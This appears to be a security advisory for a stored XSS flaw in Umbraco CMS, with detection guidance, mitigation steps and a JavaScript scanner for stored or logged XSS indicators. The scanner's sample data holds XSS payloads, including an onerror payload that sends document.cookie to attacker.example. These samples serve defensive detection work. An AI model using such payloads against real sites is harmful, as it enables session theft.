
CVE-2026-46609: Umbraco CMS XSS Vulnerability

CVE-2026-46609 is a cross-site scripting flaw in Umbraco CMS affecting versions 14.0.0 to 17.3.x, allowing authenticated users to inject malicious HTML. This article covers technical details, affected versions, and fixes.


CVE-2026-46609 Overview

CVE-2026-46609 is a stored Cross-Site Scripting (XSS) vulnerability in Umbraco CMS, an ASP.NET-based content management system. The flaw affects versions 14.0.0 through 17.3.x. Authenticated users can inject HTML markup into an input field that is later rendered in a confirmation dialog without proper output encoding. The Umbraco team patched the issue in version 17.4.0.

Impact

An authenticated backoffice user can store HTML or script content that executes in the browser of any other backoffice user who opens the confirmation dialog containing it. Because the script runs inside the victim's authenticated backoffice session, it can capture that session's credentials or tokens and perform backoffice actions as the victim.

Affected Products

  • Umbraco CMS versions 14.0.0 through 17.3.x
  • Any deployment of those versions whose backoffice is open to users who are not fully trusted (editors, contributors, third-party agencies), since the attacker only needs a login with permission to submit the affected input

Discovery Timeline

  • 2026-06-10 - CVE-2026-46609 published to NVD
  • 2026-06-10 - Last updated in NVD database

Technical Details for CVE-2026-46609

Vulnerability Analysis

The vulnerability is a stored Cross-Site Scripting (XSS) flaw classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). Umbraco's backoffice accepts user-supplied input through an input field and later displays that input inside a confirmation dialog. The dialog rendering path does not apply HTML output encoding, so markup and script supplied by an authenticated user are interpreted by the browser rather than shown as text.

Exploitation requires an authenticated session with permission to submit the affected input. The attacker stores malicious payload content, and execution occurs when another backoffice user triggers the confirmation dialog containing the payload. The resulting script runs in the victim's browser context within the Umbraco backoffice.

Impact is limited to confidentiality and integrity of the affected user's browser session. The vulnerability does not directly impact availability and requires user interaction to trigger the malicious payload.

Root Cause

The root cause is missing output encoding in the confirmation dialog rendering logic. The dialog component inserts the stored value into the DOM as HTML rather than as text, so the characters that carry meaning in markup (<, >, &, " and ') are not escaped. Encoding the value at the point of output, with the encoder matching the context it lands in (HTML text versus attribute value), would have prevented script execution. Encoding at input time is not a substitute, because the same stored value may later be rendered in several different contexts.

Attack Vector

The attack vector is network-based and requires low privileges plus user interaction. An authenticated backoffice user submits a payload such as <img src=x onerror=...> into the vulnerable input. When a second user later opens the confirmation dialog referencing that data, the browser parses the markup and runs the event handler. Whether a bare <script> tag also executes depends on how the dialog inserts the markup (script elements added through innerHTML are not run by the browser), so event-handler payloads are the reliable form. No verified public exploit code is available. Technical details are documented in the GitHub Security Advisory GHSA-vr9v-27gg-qgx4.

Detection Methods for CVE-2026-46609

Indicators of Compromise

  • Unexpected HTML tags, <script> elements, or event handler attributes such as onerror or onload stored in Umbraco content fields
  • Backoffice users reporting unexpected dialog behavior, redirects, or session anomalies
  • Outbound requests from authenticated backoffice sessions to attacker-controlled domains

Detection Strategies

  • Audit Umbraco database content fields for HTML markup or JavaScript syntax patterns that should not appear in plain-text inputs
  • Inspect web server and application logs for POST requests from low-privileged users containing encoded script payloads
  • Monitor browser Content Security Policy (CSP) violation reports originating from the Umbraco backoffice
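As an added example (not a tool shipped with Umbraco or by this site), the scanner below implements the first two strategies and the stored-markup indicators above over constructed sample data: a handful of content-field rows that should contain plain text, and request log lines whose form bodies are URL-encoded. It decodes percent- and entity-encoding once before matching, so a payload hidden in an encoded POST body is compared in the same form as raw markup in the database. The row shape, the `user=... body=...` log format, the `/umbraco/example-endpoint` path and the user names are assumptions, not Umbraco's schema or log format.

```javascript
// Added example: a scanner for the indicators listed above, run over
// constructed sample data. The row shape, the log line format, the endpoint
// path and the user names are assumptions, not Umbraco's schema or logs.

// Maps a numeric character reference to its character, dropping out-of-range values.
const fromCodePoint = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

// Undo the layers a payload may be wrapped in before matching, so that a
// URL-encoded form body in a log line and an entity-encoded value are checked
// in the same form as raw markup in a content field. One level of each only.
function normalize(value) {
  let s = String(value);
  try {
    s = decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (_) {
    // Not valid percent-encoding (e.g. "50% off"); keep the value as-is.
  }
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => fromCodePoint(parseInt(d, 10)))
    .replace(/&lt;/gi, '<')
    .replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"')
    .replace(/&apos;/gi, "'")
    .replace(/&amp;/gi, '&'); // last, so "&amp;lt;" is unwrapped only one level
}

// Indicators in the order they are reported. 'html-tag' is a low-severity
// signal for fields that should hold plain text; the rest are active content.
const INDICATORS = [
  { name: 'html-tag',       re: /<[a-z][a-z0-9-]*[\s>\/]/i },
  { name: 'script-tag',     re: /<\s*script\b/i },
  { name: 'event-handler',  re: /<[a-z][^>]*\son[a-z]+\s*=/i },
  { name: 'javascript-url', re: /\b(?:href|src|action|formaction)\s*=\s*["']?\s*javascript:/i },
  { name: 'embedded-frame', re: /<\s*(?:iframe|object|embed)\b|\bsrcdoc\s*=/i },
  { name: 'svg-or-math',    re: /<\s*(?:svg|math)\b/i },
];

// Returns the names of all indicators that match the normalized value.
function scanValue(value) {
  const text = normalize(value);
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Constructed sample rows standing in for a dump of a plain-text content field.
const CONTENT_ROWS = [
  { id: 1012, field: 'nodeName', value: 'Quarterly report' },
  { id: 1013, field: 'nodeName', value: '<img src=x onerror=alert(document.domain)>' },
  { id: 1014, field: 'nodeName', value: 'Q&A: <b>bold</b> title' },
  { id: 1015, field: 'nodeName', value: '<a href="javascript:alert(1)">link</a>' },
];

// Returns only the rows with at least one indicator, with the indicators attached.
function scanContentRows(rows) {
  return rows
    .map((row) => ({ ...row, findings: scanValue(row.value) }))
    .filter((row) => row.findings.length > 0);
}

// Constructed log lines in an assumed "user=<name> body=<urlencoded form>" format.
const LOG_LINES = [
  '2026-06-11T09:14:02Z POST /umbraco/example-endpoint user=editor01 body=name=Quarterly+report',
  '2026-06-11T09:15:40Z POST /umbraco/example-endpoint user=editor01 body=name=%3Cimg+src%3Dx+onerror%3Dfetch(%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie)%3E',
  '2026-06-11T09:16:05Z POST /umbraco/example-endpoint user=editor02 body=name=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B',
];

// Parses one line, scans every form field in the body and returns the user with
// the union of findings, or null when the line carries no request body.
function scanLogLine(line) {
  const m = /user=(\S+)\s+body=(\S*)$/.exec(line);
  if (!m) return null;
  const findings = new Set();
  for (const pair of m[2].split('&')) {
    const value = pair.slice(pair.indexOf('=') + 1);
    scanValue(value).forEach((f) => findings.add(f));
  }
  return { user: m[1], findings: [...findings] };
}

console.log(scanContentRows(CONTENT_ROWS));
console.log(LOG_LINES.map(scanLogLine));
```

Two points the sample data is chosen to show: row 1014 is flagged only as `html-tag`, because inline formatting in a name field is suspicious but not executable, while the third log line is caught even though its payload was entity-encoded and then URL-encoded. Tune the `html-tag` indicator per field: it is correct for fields that must be plain text and pure noise on rich-text properties.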

Monitoring Recommendations

  • Enable detailed audit logging for backoffice user actions, particularly content edits that populate confirmation dialogs
  • Forward Umbraco application logs and web server logs to a centralized SIEM for correlation across user sessions
  • Alert on backoffice account activity that includes input patterns matching common XSS payloads

How to Mitigate CVE-2026-46609

Immediate Actions Required

  • Upgrade Umbraco CMS to version 17.4.0 or later
  • Review recent backoffice user submissions for stored HTML or script content and remove malicious entries
  • Rotate credentials and sessions for any backoffice users suspected of exposure to the payload

Patch Information

Umbraco released version 17.4.0 with proper output encoding applied to the confirmation dialog rendering path. The fix is documented in the Umbraco GitHub Security Advisory. All deployments running versions 14.0.0 through 17.3.x should upgrade to the patched release.

Workarounds

  • Restrict backoffice access to trusted administrators until the patch is applied; this is the only workaround that removes the attacker's precondition (an authenticated account), and the two below only reduce exposure
  • Deploy a Content Security Policy (CSP) that disallows inline script execution for the Umbraco backoffice, and test it against a staging backoffice first, since a policy that blocks inline scripts can also break legitimate backoffice functionality
  • Apply a web application firewall (WAF) rule to block HTML and script syntax in the affected input fields, bearing in mind that WAF signatures are routinely bypassed and that overly broad rules will also block legitimate content containing angle brackets; treat this as a speed bump, not a fix
```bash
# Upgrade Umbraco CMS via dotnet CLI. Run from the directory holding the
# .csproj that references Umbraco.Cms. A jump from an earlier major to 17.4.0
# is a major-version upgrade: check whether the advisory lists a patched
# release for your major version and follow Umbraco's upgrade guidance first.
dotnet add package Umbraco.Cms --version 17.4.0
dotnet restore
dotnet build
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
